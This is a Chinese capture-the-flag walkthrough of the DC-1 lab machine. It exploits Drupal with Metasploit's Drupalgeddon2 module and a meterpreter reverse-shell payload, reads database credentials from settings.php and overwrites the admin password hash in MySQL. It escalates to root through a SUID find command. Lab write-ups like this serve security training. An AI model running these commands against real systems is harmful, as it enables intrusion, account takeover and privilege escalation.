dc-1靶机

环境配置
kali虚拟机的安装:Kali虚拟机安装,设置中文等详细教程,Linux最新免镜像版
dc-1靶机的安装:官网下载

使用说明:下载后解压后得到一个ova的文件,在vm虚拟机中直接打开设置好相关的设置,配置好之后,注意靶机和kali的网络设置调换成NAT模式
在这里插入图片描述
渗透过程:
先打开靶机和kali,查看靶机的mac地址
在这里插入图片描述
然后在kali上使用arp-scan -l命令查看靶机ip
在这里插入图片描述
可以得到靶机地址是192.168.195.131,然后使用nmap -A 192.168.195.131
查看开放了什么端口

-A: 激进型 启用许多扫描选项,版本扫描,脚本扫描等(慎用)
在这里插入图片描述

可以看到开放了ssh端口和http和111端口,尝试查看一下网站,有一个登陆框,尝试sql注入,发现没有用,不过可以从界面发现cms是drupal
在这里插入图片描述
然后用御剑后台扫描,发现有些文件
在这里插入图片描述

知道了cms是drupal,drupal有一些可以利用的漏洞进入msf

msfconsole

查找相应模块

search Drupa

在这里插入图片描述
尝试使用相应模块发现 exploit/unix/webapp/drupal_drupalgeddon2可以使用

use exploit/unix/webapp/drupal_drupalgeddon2

在这里插入图片描述
选择查看payload

show payloads

在这里插入图片描述
发现了熟悉的反弹shell:php/meterpreter/reverse_tcp
使用payloads:set payload php/meterpreter/reverse_tcp
配置相应的设置:set rhosts 192.168.195.131
启动:exploit
在这里插入图片描述
查看DC-1基本信息:sysinfo
得到shell:shell
通过python反弹shell:python -c 'import pty; pty.spawn("/bin/bash")'
查看文件:

ls
cat flag1.txt

在这里插入图片描述

得到提示:​ 每个好的CMS都需要一个配置文件——你也是
提示配置文件,想到网站cms的根配置文件,网上查询drupal配置文件位置
查看配置文件:find / -name settings.php
查看网站目录:cat sites/default/settings.php
发现flag2和sql信息
在这里插入图片描述
翻译flag2:

蛮力和字典攻击是不是 *只有获得访问(您将需要访问)的方法。 *您可以如何处理这些凭据?

登录mysql,登陆之前一定要记得打开mysql服务

service mysql start

登录数据库:mysql -udbuser -pR0ck3t
下面就是基本的mysql的操作
查看库:show databases;
进入到drupaldb库中:user drupaldb;
查看表:show tables;
查看users表中的内容:select * from users;
在这里插入图片描述
得到用户名和密码,尝试修改密码:update users set pass='123456' where name="admin"显示修改成功,尝试去登陆发现登陆失败,这里显示的密码是加密过的,尝试去找到drupaldb的加密方式,然后把密码更改为一个加密过的但是是已知的密码。在drupal的官网上找到了druple的加密脚本位置./script/password-hash.sh,直接使用这个脚本进行加密。
退出mysql:quit
进行密码加密:

cd /var/www/scripts
ls

在这里插入图片描述
能找到加密脚本
使用脚本进行加密:./scripts/password-hash.sh 123
在这里插入图片描述
进入数据库进行改密update users set pass='$S$DFcCu/eLtuTy8fcKPKPPN1qRbTcgj9ci7pen8vQ6fw2E6DudTdNr' where name = "admin";

在这里插入图片描述

返回登陆页面进行登录,找到flag3
在这里插入图片描述
根据提示查看 /etc/passwd,发现flag4

cat /etc/passwd

在这里插入图片描述
尝试查看flag4

cd /home/flag4
ls
cat flag4.txt

在这里插入图片描述
根据提示要在根目录查看访问标志,需要提权到root用户

find / -perm -4000
//找suid的程序

发现find命令有suid权限,进行提权(find的提权操作)

find ./ aaa -exec '/bin/sh' \;

进入目录查看flag

cd /root
ls
cat thefinalflag.txt

在这里插入图片描述

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值